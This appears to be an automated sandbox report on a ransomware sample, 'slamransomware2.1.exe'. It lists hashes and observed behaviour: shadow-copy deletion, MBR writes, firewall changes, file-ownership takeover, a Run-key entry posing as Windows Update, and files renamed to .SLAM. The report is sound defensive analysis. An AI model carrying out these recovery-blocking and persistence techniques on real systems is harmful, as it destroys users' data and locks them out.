Analysis
-
max time kernel
600s -
max time network
603s -
platform
windows10-1703_x64 -
resource
win10-20220812-en -
resource tags
arch:x64arch:x86image:win10-20220812-enlocale:en-usos:windows10-1703-x64system -
submitted
25-10-2022 11:24
Static task
static1
Behavioral task
behavioral1
Sample
slamransomware2.1.exe
Resource
win10-20220812-en
General
-
Target
slamransomware2.1.exe
-
Size
3.9MB
-
MD5
b4c5397ba985fe7770a4822f28343198
-
SHA1
18bb6536a8caa53fa006b0e78d4c4097ecee583f
-
SHA256
acb3d1eab482ba2428084e53cc04fbe08fed4c603861e9ce116b4e9aad2096cf
-
SHA512
c8b2ce7b61c5fda173ce404c4ca602a794db016a942a44fe50236dd3a54c047fb022c2772446e87744caeb5da02a3111e9169a0cebf83fca2e5c57fd765e3013
-
SSDEEP
49152:nbX8LRHjOGjBlB4XyGOkNdVxzyK8LRHjOGjBlB4XyGOkNdV5A:bX88cIyGOk3188cIyGOk3jA
Malware Config
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Disables Task Manager via registry modification
-
Drops file in Drivers directory 1 IoCs
Processes:
WindowsFormsApp1.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts WindowsFormsApp1.exe -
Executes dropped EXE 7 IoCs
Processes:
uac.exeslam.exelector_mbr.exelo.exeWindowsFormsApp1.exembr.exeChromeRecovery.exepid process 2224 uac.exe 1980 slam.exe 4712 lector_mbr.exe 4564 lo.exe 4068 WindowsFormsApp1.exe 1600 mbr.exe 4308 ChromeRecovery.exe -
Modifies Windows Firewall 1 TTPs 5 IoCs
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exepid process 4492 netsh.exe 4844 netsh.exe 4964 netsh.exe 1752 netsh.exe 2080 netsh.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
WindowsFormsApp1.exedescription ioc process File renamed C:\Users\Admin\Pictures\CloseConvertFrom.raw => C:\Users\Admin\Pictures\CloseConvertFrom.raw.SLAM WindowsFormsApp1.exe File renamed C:\Users\Admin\Pictures\EditSearch.tif => C:\Users\Admin\Pictures\EditSearch.tif.SLAM WindowsFormsApp1.exe File renamed C:\Users\Admin\Pictures\PushRevoke.png => C:\Users\Admin\Pictures\PushRevoke.png.SLAM WindowsFormsApp1.exe File renamed C:\Users\Admin\Pictures\RestartRename.tiff => C:\Users\Admin\Pictures\RestartRename.tiff.SLAM WindowsFormsApp1.exe File renamed C:\Users\Admin\Pictures\UpdateRepair.crw => C:\Users\Admin\Pictures\UpdateRepair.crw.SLAM WindowsFormsApp1.exe File renamed C:\Users\Admin\Pictures\HideMeasure.crw => C:\Users\Admin\Pictures\HideMeasure.crw.SLAM WindowsFormsApp1.exe File renamed C:\Users\Admin\Pictures\ReadRemove.tif => C:\Users\Admin\Pictures\ReadRemove.tif.SLAM WindowsFormsApp1.exe File opened for modification C:\Users\Admin\Pictures\RestartRename.tiff WindowsFormsApp1.exe File opened for modification C:\Users\Admin\Pictures\StepGrant.tiff WindowsFormsApp1.exe File renamed C:\Users\Admin\Pictures\StepGrant.tiff => C:\Users\Admin\Pictures\StepGrant.tiff.SLAM WindowsFormsApp1.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 4956 icacls.exe 204 takeown.exe 188 icacls.exe 2552 takeown.exe -
Loads dropped DLL 4 IoCs
Processes:
uac.exelector_mbr.exepid process 2224 uac.exe 2224 uac.exe 4712 lector_mbr.exe 4712 lector_mbr.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 204 takeown.exe 188 icacls.exe 2552 takeown.exe 4956 icacls.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
mbr.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run mbr.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\temp\\mbr.exe" mbr.exe -
Drops desktop.ini file(s) 9 IoCs
Processes:
WindowsFormsApp1.exedescription ioc process File created C:\Users\Admin\Pictures\Camera Roll\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\Pictures\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\Pictures\Saved Pictures\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\Music\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\Videos\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\OneDrive\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\Desktop\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\Downloads\desktop.ini WindowsFormsApp1.exe File created C:\Users\Admin\Documents\desktop.ini WindowsFormsApp1.exe -
Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
lector_mbr.exembr.exedescription ioc process File opened for modification \??\PhysicalDrive0 lector_mbr.exe File opened for modification \??\PhysicalDrive0 mbr.exe -
Drops file in System32 directory 1 IoCs
Processes:
lo.exedescription ioc process File created C:\Windows\System32\LogonUI.exe lo.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
WindowsFormsApp1.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Control Panel\Desktop\Wallpaper = "C:\\temp\\backtrack.png" WindowsFormsApp1.exe -
Drops file in Program Files directory 7 IoCs
Processes:
elevation_service.exedescription ioc process File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecovery.exe elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\manifest.json elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\manifest.json elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\_metadata\verified_contents.json elevation_service.exe File opened for modification C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\_metadata\verified_contents.json elevation_service.exe File created C:\Program Files\Google\Chrome\ChromeRecovery\scoped_dir4792_2138878341\ChromeRecoveryCRX.crx elevation_service.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
firefox.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
chrome.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3788 vssadmin.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url2 = "https://www.facebook.com/" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000742693025ef6ab4aa9808eab4c23bc9a000000000200000000001066000000010000200000005ee3aec32946da7d6644c13c579d72e5e347fb803566d212ccbef7eae26dcb8c000000000e800000000200002000000071fbb70c0e8715d855fe6d46119eecdd24fa39d653f060aeeaf419a8a2b620d020000000dc72166afbdec3a2c7eae8e88952e8fe2411ec35821e919f2d4e1351c387a1f840000000eab3896d8c2387cf7fb508d186789fe19ca98ada8ab779361a3691f5607ad8e8d1e3197b79774db0b22a1b08a659cc4dfe0d570d55aece1b81fc71f38b16dde3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{B149CB72-5468-11ED-98FA-7A36BF7F232E} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2248755680" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url4 = "https://signin.ebay.com/ws/ebayisapi.dll" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url2 = 0000000000000000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30992501" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url1 = 0b74d59575e8d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url1 = "http://idomana.000webhostapp.com/" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000742693025ef6ab4aa9808eab4c23bc9a0000000002000000000010660000000100002000000026409ddb7cdac8685536548ea0f1cb4dccfa40ed9367d847cf31af397cb54c1e000000000e8000000002000020000000e1bedb7e79ed4f1d02d4f51d2639b6388709d49ee194c53803d59a80989cad76200000005e762d24580dc2c8c2bbc607d6af4d3a1c333a807fe90d63b6e2acef99cec957400000000d0de478e9bded95fb92ca671555dccfb0a508fded59737c4b17c21dd7fab7d095e9cc4178c7020c8f7d397892e22c1ef6d322328fd3b8813938f844629ec1a8 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30992501" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30992501" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "373469389" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "373517975" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "2249686848" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url6 = "https://twitter.com/" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = d0f97ca875e8d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url3 = 0000000000000000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "373485983" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10e984a875e8d801 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url4 = 0000000000000000 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url5 = "https://login.live.com/" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url5 = 0000000000000000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2249686848" IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "2248755680" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLs\url3 = "https://login.aliexpress.com/" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TypedURLsTime\url6 = 0000000000000000 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30992501" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe -
Modifies registry class 1 IoCs
Processes:
firefox.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1099808672-3828198950-1535142148-1000_Classes\Local Settings firefox.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
WindowsFormsApp1.exepid process 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
Processes:
chrome.exepid process 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe -
Suspicious use of AdjustPrivilegeToken 56 IoCs
Processes:
takeown.exeWindowsFormsApp1.exetakeown.exevssvc.exeWMIC.exevssvc.exefirefox.exedescription pid process Token: SeTakeOwnershipPrivilege 204 takeown.exe Token: SeDebugPrivilege 4068 WindowsFormsApp1.exe Token: SeDebugPrivilege 4068 WindowsFormsApp1.exe Token: SeTakeOwnershipPrivilege 2552 takeown.exe Token: SeBackupPrivilege 3976 vssvc.exe Token: SeRestorePrivilege 3976 vssvc.exe Token: SeAuditPrivilege 3976 vssvc.exe Token: SeIncreaseQuotaPrivilege 4236 WMIC.exe Token: SeSecurityPrivilege 4236 WMIC.exe Token: SeTakeOwnershipPrivilege 4236 WMIC.exe Token: SeLoadDriverPrivilege 4236 WMIC.exe Token: SeSystemProfilePrivilege 4236 WMIC.exe Token: SeSystemtimePrivilege 4236 WMIC.exe Token: SeProfSingleProcessPrivilege 4236 WMIC.exe Token: SeIncBasePriorityPrivilege 4236 WMIC.exe Token: SeCreatePagefilePrivilege 4236 WMIC.exe Token: SeBackupPrivilege 4236 WMIC.exe Token: SeRestorePrivilege 4236 WMIC.exe Token: SeShutdownPrivilege 4236 WMIC.exe Token: SeDebugPrivilege 4236 WMIC.exe Token: SeSystemEnvironmentPrivilege 4236 WMIC.exe Token: SeRemoteShutdownPrivilege 4236 WMIC.exe Token: SeUndockPrivilege 4236 WMIC.exe Token: SeManageVolumePrivilege 4236 WMIC.exe Token: 33 4236 WMIC.exe Token: 34 4236 WMIC.exe Token: 35 4236 WMIC.exe Token: 36 4236 WMIC.exe Token: SeIncreaseQuotaPrivilege 4236 WMIC.exe Token: SeSecurityPrivilege 4236 WMIC.exe Token: SeTakeOwnershipPrivilege 4236 WMIC.exe Token: SeLoadDriverPrivilege 4236 WMIC.exe Token: SeSystemProfilePrivilege 4236 WMIC.exe Token: SeSystemtimePrivilege 4236 WMIC.exe Token: SeProfSingleProcessPrivilege 4236 WMIC.exe Token: SeIncBasePriorityPrivilege 4236 WMIC.exe Token: SeCreatePagefilePrivilege 4236 WMIC.exe Token: SeBackupPrivilege 4236 WMIC.exe Token: SeRestorePrivilege 4236 WMIC.exe Token: SeShutdownPrivilege 4236 WMIC.exe Token: SeDebugPrivilege 4236 WMIC.exe Token: SeSystemEnvironmentPrivilege 4236 WMIC.exe Token: SeRemoteShutdownPrivilege 4236 WMIC.exe Token: SeUndockPrivilege 4236 WMIC.exe Token: SeManageVolumePrivilege 4236 WMIC.exe Token: 33 4236 WMIC.exe Token: 34 4236 WMIC.exe Token: 35 4236 WMIC.exe Token: 36 4236 WMIC.exe Token: SeBackupPrivilege 2700 vssvc.exe Token: SeRestorePrivilege 2700 vssvc.exe Token: SeAuditPrivilege 2700 vssvc.exe Token: SeDebugPrivilege 1556 firefox.exe Token: SeDebugPrivilege 1556 firefox.exe Token: SeDebugPrivilege 1556 firefox.exe Token: SeDebugPrivilege 1556 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
WindowsFormsApp1.exepid process 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe 4068 WindowsFormsApp1.exe -
Suspicious use of SendNotifyMessage 27 IoCs
Processes:
chrome.exefirefox.exepid process 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 4876 chrome.exe 1556 firefox.exe 1556 firefox.exe 1556 firefox.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
firefox.exeiexplore.exeIEXPLORE.EXEpid process 1556 firefox.exe 5116 iexplore.exe 5116 iexplore.exe 4512 IEXPLORE.EXE 4512 IEXPLORE.EXE 5116 iexplore.exe 4512 IEXPLORE.EXE 4512 IEXPLORE.EXE 5116 iexplore.exe 5116 iexplore.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
